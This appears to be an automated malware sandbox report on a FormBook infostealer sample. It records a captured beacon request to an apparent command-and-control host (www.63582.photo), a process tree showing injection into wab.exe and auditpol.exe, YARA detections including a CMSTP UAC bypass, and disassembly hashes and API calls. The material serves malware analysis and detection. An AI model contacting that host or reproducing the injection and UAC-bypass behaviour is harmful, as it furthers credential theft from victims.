49	192.168.2.4	49792	147.92.40.174	80

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:27:18.461025000 CEST	459	OUT	GET /i70z/?gB7t=xFqX1hC8&sL9tFJ=ggo41uDwxRIOOoeP1Oo5p7RDznCtlfKlzUAj4DLPY1E55MlxYQjRP3RbpEn9FapIu2dLvf4ZjTINa65Ki93S9Jq8KjMoDKqt4A2Swb3ejqHfvRtW1ozGZVs= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.63582.photo Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Sep 26, 2024 14:27:19.547317028 CEST	328	IN	HTTP/1.1 530 Date: Thu, 26 Sep 2024 12:27:19 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Set-Cookie: guard=0723151eGUlPtJEOPsOLEaM0XRNYQCjHwQ==; path=/;Expires=Thu, 26-Sep-24 12:37:19 GMT Cache-Control: no-cache Server: cdn Data Raw: 32 37 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 5f 67 75 61 72 64 2f 61 75 74 6f 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 27<script src="/_guard/auto.js"></script>0

Target ID:	0
Start time:	08:23:02
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe"
Imagebase:	0x1c076c40000
File size:	2'061'855 bytes
MD5 hash:	C001445A0C5BADFFEFE083FE87340CED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:23:03
Start date:	26/09/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Windows Mail\wab.exe"
Imagebase:	0x5c0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2015330736.0000000000570000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2015330736.0000000000570000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2015886760.0000000004F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2015886760.0000000004F90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:23:03
Start date:	26/09/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):
Commandline:	"C:\Program Files (x86)\Windows Mail\wab.exe"
Imagebase:
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	08:23:04
Start date:	26/09/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 6796 -s 1020
Imagebase:	0x7ff69b9b0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:23:28
Start date:	26/09/2024
Path:	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe"
Imagebase:	0x850000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4129577177.0000000004870000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4129577177.0000000004870000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	08:23:30
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\auditpol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\auditpol.exe"
Imagebase:	0x590000
File size:	32'768 bytes
MD5 hash:	70DF7973F8D4AAA2EE3B28391239397B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4128918801.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4128918801.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4128970770.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4128970770.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	08:23:42
Start date:	26/09/2024
Path:	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe"
Imagebase:	0x850000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.4131269057.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.4131269057.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	08:23:55
Start date:	26/09/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B950068 Relevance: 3.6, Strings: 1, Instructions: 2372
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x(&y, xrefs: 00007FFD9B951459

Memory Dump Source

Source File: 00000000.00000002.1849652280.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b950000_RN# D7521-RN-00353 REV-2.jbxd

Similarity

API ID:
String ID: x(&y
API String ID: 0-1402342027
Opcode ID: da01e9768b7a04f6696ff12df2d3f246ad2276e43b195295743f3563ace397c9
Instruction ID: bfe10cde00c17d992a9d756e367ca18fc6416118e14b5a1c786c4737106c65ad
Opcode Fuzzy Hash: da01e9768b7a04f6696ff12df2d3f246ad2276e43b195295743f3563ace397c9
Instruction Fuzzy Hash: B4F24D71A5F7C95FE762DBA888655A47FE0EF57700F1A01FAC488CB0E3DA686906C341

Function 00007FFD9B88E895 Relevance: 3.2, Strings: 1, Instructions: 1997COMMON

Download Yara Rule

Strings

TN_H, xrefs: 00007FFD9B88E98E

Memory Dump Source

Source File: 00000000.00000002.1849427005.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_RN# D7521-RN-00353 REV-2.jbxd

Similarity

API ID:
String ID: TN_H
API String ID: 0-1510698778
Opcode ID: 23a30356039a8e3c408150ca054dc28ce4da2f283618f341a98a4c530be5c23d
Instruction ID: 88fef4979c5a831f9a11aceb280cbf2bc1e09d986ffc0dd9e65c65cc76b32e9b
Opcode Fuzzy Hash: 23a30356039a8e3c408150ca054dc28ce4da2f283618f341a98a4c530be5c23d
Instruction Fuzzy Hash: D5D29A3160DF894FD329DB28C4A04B5B7E2FF99301B1545BEE49AC72A6DE34E942C781

Function 00007FFD9B8833D0 Relevance: 2.0, Strings: 1, Instructions: 739
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00007FFD9B884D5F

Memory Dump Source

Source File: 00000000.00000002.1849427005.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_RN# D7521-RN-00353 REV-2.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 0f11c0e0626f806a93708511a123df78c000e49181624376bd006bbabd8c4955
Instruction ID: a29d3873c9e7b3418ec4cefad6f5d3c892ce05179607c73d4b4e57c4649c1611
Opcode Fuzzy Hash: 0f11c0e0626f806a93708511a123df78c000e49181624376bd006bbabd8c4955
Instruction Fuzzy Hash: 3F225832A1DE490FE768DB6894A15B173D1EF49314B1942BDD4AEC71A7ED38F8438381

Function 00007FFD9B8845F0 Relevance: 1.7, Strings: 1, Instructions: 454
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fish, xrefs: 00007FFD9B884660

Memory Dump Source

Source File: 00000000.00000002.1849427005.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_RN# D7521-RN-00353 REV-2.jbxd

Similarity

API ID:
String ID: fish
API String ID: 0-1064584243
Opcode ID: 95eba592ebc5c4deccfe75c522591194205efdbe4a7ce5665c0a4d7a3cd845fc
Instruction ID: 4e422c0b779cd16a5cddc90ce9f6943c3017989e0fb6000c5163ba7118cbfac3
Opcode Fuzzy Hash: 95eba592ebc5c4deccfe75c522591194205efdbe4a7ce5665c0a4d7a3cd845fc
Instruction Fuzzy Hash: 8FC15E32B1DE4E4FE76CAB6898755B577D1EF9A310B09417ED09BC31E3DE28A8028741

Function 00007FFD9B88BF11 Relevance: 1.5, Instructions: 1458
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1849427005.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_RN# D7521-RN-00353 REV-2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e66cae0149f77d3527c091a1c05ae259c0808b4148c228208fac6fccbc15692
Instruction ID: 3b3aeae7c2b221be89c557fccc86d81932a4d8ba17366b7823a813d6514df05a
Opcode Fuzzy Hash: 7e66cae0149f77d3527c091a1c05ae259c0808b4148c228208fac6fccbc15692
Instruction Fuzzy Hash: D3A2483061DB8A4FE719DB38C4A44A5BBE1FF99300B1545BED09AC72B6DE34E946CB40

Function 00007FFD9B88B2D3 Relevance: .7, Instructions: 719COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1849427005.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_RN# D7521-RN-00353 REV-2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45894f04f78760f4bec48dac955f449957874e423aaa85184260c2cf99235523
Instruction ID: 56e39074cb6bbd456243b397528a7e34ffbf5b61aa75657b64628daf26415c56
Opcode Fuzzy Hash: 45894f04f78760f4bec48dac955f449957874e423aaa85184260c2cf99235523
Instruction Fuzzy Hash: 8122793160EF8A4FE369DB6484610B577E2FFC9301B0545BED4AAC72B2DE35A946C381

Function 00007FFD9B88BA89 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1849427005.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_RN# D7521-RN-00353 REV-2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6df6d609c6d3b6244a4a7473a840c8d0b184718e40c35932d9ceedcf3ee158f5
Instruction ID: 637aa5da20bbb3ffe56a374fc1d9d22c378a50d247118d422ffa62abb8806520
Opcode Fuzzy Hash: 6df6d609c6d3b6244a4a7473a840c8d0b184718e40c35932d9ceedcf3ee158f5
Instruction Fuzzy Hash: F8E15931A0DF8A4FE329CB6484A10B1B7E2FFC5301B1546BED4E6C72A6DD35A946C781

Function 00007FFD9B8831B9 Relevance: 1.6, APIs: 1, Instructions: 121
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFD9B883261

Memory Dump Source

Source File: 00000000.00000002.1849427005.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_RN# D7521-RN-00353 REV-2.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: fe0008aa9820cd5fb5f585e5a3bca5ebac5f74d82450265d4dabbec04c9b8a8a
Instruction ID: 2cbf81580ba4db184d1a2df59bde294a4674f9e35cea6bee9ab5b48770c0a8e7
Opcode Fuzzy Hash: fe0008aa9820cd5fb5f585e5a3bca5ebac5f74d82450265d4dabbec04c9b8a8a
Instruction Fuzzy Hash: 0E31C431A0CA5C8FDB18DB9CA845AF97BE1EF95321F04426FE049D3592CB646846CB91

Function 00007FFD9B9510E8 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1849652280.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b950000_RN# D7521-RN-00353 REV-2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69ba7e73b1a3601f5ff738b7552a6bf180e863f1735e1657585a95172ef3d311
Instruction ID: 693de9a064e5c1f66795f87d66ecadcb892c4e0879bcd2c3dd810ac933084b1c
Opcode Fuzzy Hash: 69ba7e73b1a3601f5ff738b7552a6bf180e863f1735e1657585a95172ef3d311
Instruction Fuzzy Hash: B6419C32A0EA9D4FDB55DFA8C8654A87BE0FF15304F0601FEC849CB1A2DA65B941C380

Analysis Process: wab.exePID: 6916, Parent PID: 6796COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	5%
Signature Coverage:	9.2%
Total number of Nodes:	141
Total number of Limit Nodes:	13

Executed Functions

Function 00417883 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178F5

Memory Dump Source

Source File: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wab.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b5941047abcb2dd0c0d4caa8a322ddd4714e5f804c4b6bfaa926e623e5ba137e
Instruction ID: 0ec811c8a09970c04f28f51881940a02224b3f96eba6562ee99082aceb88b573
Opcode Fuzzy Hash: b5941047abcb2dd0c0d4caa8a322ddd4714e5f804c4b6bfaa926e623e5ba137e
Instruction Fuzzy Hash: 330152B5E0020DBBDF10EAA5DC46FDEB3789B54308F4041A6E90897241F634EB48CB95

Function 0042C783 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C7B7

Memory Dump Source

Source File: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wab.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 3bd0b1cd51ec3253897aeea0e62ed861c48e2701c67753409419d919a5035729
Instruction ID: 16211c2f391cd9f8fbe282a7646249a36b2ac36665dd90063f72cb7f398830dc
Opcode Fuzzy Hash: 3bd0b1cd51ec3253897aeea0e62ed861c48e2701c67753409419d919a5035729
Instruction Fuzzy Hash: 93E046722002187BC220BA5ADC01F9BB7ACEBC5725F40802AFA49A7241DA71BA0187E5

Function 02EB35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EB35CA

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 799e2efd479f7cdf7bbad65aa02fc3fa8694172b470c3744f1214204dc197122
Instruction ID: a5eb21d4a14ac722d87218827d63ed77a91b93bb0d12f4988497477ad0cb7687
Opcode Fuzzy Hash: 799e2efd479f7cdf7bbad65aa02fc3fa8694172b470c3744f1214204dc197122
Instruction Fuzzy Hash: E290023164550402D541B1994715707100587D0201F75D415A0424568D87968A52A5A2

Function 02EB2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02EB2B6A

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: feda8a2068ce06972a253377835de938c55630fe2f78358e72852978da408000
Instruction ID: 512f97cccd8acb71f9e0715beaa412b5e6570591ed6d00c80985b88ef738a062
Opcode Fuzzy Hash: feda8a2068ce06972a253377835de938c55630fe2f78358e72852978da408000
Instruction Fuzzy Hash: 59900271242400034546B1994615617400A87E0201B65D025E1014590DC5268992A125

Function 02EB2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02EB2C7A

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 577f2c29fe9dae73c7f284dd509ef13a686b28c9c88bc3c2f019c8c556ebd3ea
Instruction ID: 084b39ec6ceb043534faec2f6020ab5ee9da1e88b58ab43e2fae985d0a4fc4f2
Opcode Fuzzy Hash: 577f2c29fe9dae73c7f284dd509ef13a686b28c9c88bc3c2f019c8c556ebd3ea
Instruction Fuzzy Hash: EC90023124148802D551B199860574B000587D0301F69D415A4424658D86968992B121

Function 02EB2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02EB2DFA

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 78887ef7f50ef92e7f0457c472f814ff9e962d119076f8c6f6b4d2af28207b57
Instruction ID: 1f89afeaac7893d09a29f13a5810d3155fb8c4c7dd6886e1f67766ef0a2389f0
Opcode Fuzzy Hash: 78887ef7f50ef92e7f0457c472f814ff9e962d119076f8c6f6b4d2af28207b57
Instruction Fuzzy Hash: F590023124140413D552B1994705707000987D0241FA5D416A0424558D96578A53E121

Function 00413FAA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

23X395L, xrefs: 004140DF, 004140E9, 004140FA
23X395L, xrefs: 004140F1, 004140F4

Memory Dump Source

Source File: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wab.jbxd

Yara matches

Similarity

API ID:
String ID: 23X395L$23X395L
API String ID: 0-1829949781
Opcode ID: b23824e6596daba84279d44f34c3dbea12d26274eefdb5c090d21795d834d864
Instruction ID: 1646144df5bea52a5c3241ba2740844e13757039181067f48aa6dfeed4e43711
Opcode Fuzzy Hash: b23824e6596daba84279d44f34c3dbea12d26274eefdb5c090d21795d834d864
Instruction Fuzzy Hash: E431AA329041497BCB11CBA59C81DDFFFA8DF86324B0081AFF954B7142DA2E0E078B94

Function 0041406C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(23X395L,00000111,00000000,00000000), ref: 004140EA

Strings

23X395L, xrefs: 004140DF, 004140E9, 004140FA
23X395L, xrefs: 004140F1, 004140F4

Memory Dump Source

Source File: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wab.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 23X395L$23X395L
API String ID: 1836367815-1829949781
Opcode ID: e0735eae53c88a418b51caef97c904114488d7c1a68ca49da4c4758d32dd0c0a
Instruction ID: df698ba3d244446d19e5a3557d79341c3fd92b9d605f7caf925d15780df7ca2b
Opcode Fuzzy Hash: e0735eae53c88a418b51caef97c904114488d7c1a68ca49da4c4758d32dd0c0a
Instruction Fuzzy Hash: 6701E9B1D4015C7ADB009AE19C82DEFBB7CDF45358F44806AFA1467101D6684E068BA5

Function 00414073 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(23X395L,00000111,00000000,00000000), ref: 004140EA

Strings

23X395L, xrefs: 004140DF, 004140E9, 004140FA
23X395L, xrefs: 004140F1, 004140F4

Memory Dump Source

Source File: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wab.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 23X395L$23X395L
API String ID: 1836367815-1829949781
Opcode ID: 1e77434e52e4ec75011d75f5a689022aca222beb78271f61df1d651f40523c9e
Instruction ID: 6c22b11d8bdd69392a3329b31997845143bb2990e8aee88a3c87e19d89b42404
Opcode Fuzzy Hash: 1e77434e52e4ec75011d75f5a689022aca222beb78271f61df1d651f40523c9e
Instruction Fuzzy Hash: 490108B1D4011C7BDB00AAD19C81DEFBB7CDF44398F40C02AFA1467101D6784E064BB5

Function 00417903 Relevance: 1.6, APIs: 1, Instructions: 82
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178F5

Memory Dump Source

Source File: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wab.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 1eb541e0435780811985e4cce447ba907fed2a2e16a91d9941b2ea156863ad24
Instruction ID: 05c7e103fd35ba9b9c0566b34acaf52d0217b8f9e7ebdf1930c0a28415a1f13b
Opcode Fuzzy Hash: 1eb541e0435780811985e4cce447ba907fed2a2e16a91d9941b2ea156863ad24
Instruction Fuzzy Hash: DD21AF71E092199FDB10DE54C444AE7BB74EF45724F1041DFE90587382F630961AC789

Function 0042CAF3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,4D8905C6,00000007,00000000,00000004,00000000,004170FF,000000F4), ref: 0042CB32

Memory Dump Source

Source File: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wab.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c4220b52d66a6df406a0f7ede6a08c4099ef5fbd99dca7745e785d217876d4ff
Instruction ID: 70406c42594c9eae712896680c64816559e021ffbf7a2fd7d8813d8d9da912eb
Opcode Fuzzy Hash: c4220b52d66a6df406a0f7ede6a08c4099ef5fbd99dca7745e785d217876d4ff
Instruction Fuzzy Hash: EBE06DB12042197BC610EE5AEC41FAB77ACEFC8710F00801AFA08A7241DA70B91087B4

Function 0042CAA3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E6BE,?,?,00000000,?,0041E6BE,?,?,?), ref: 0042CADF

Memory Dump Source

Source File: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wab.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c8f9a39011208eef6f2c2b8b2b7c5f33530cc342eb2c6212f62236e168b0262c
Instruction ID: 8aeca0816ad4bae918f13ffb0ce8e923835c4c39eb1233344430bf16010806fa
Opcode Fuzzy Hash: c8f9a39011208eef6f2c2b8b2b7c5f33530cc342eb2c6212f62236e168b0262c
Instruction Fuzzy Hash: 9EE06DB12002087BD610EE5AEC41F9B77ECEFC5710F00401AFA48A7241D670B9108BB8

Function 0042CB43 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,03E38DEE,?,?,03E38DEE), ref: 0042CB77

Memory Dump Source

Source File: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

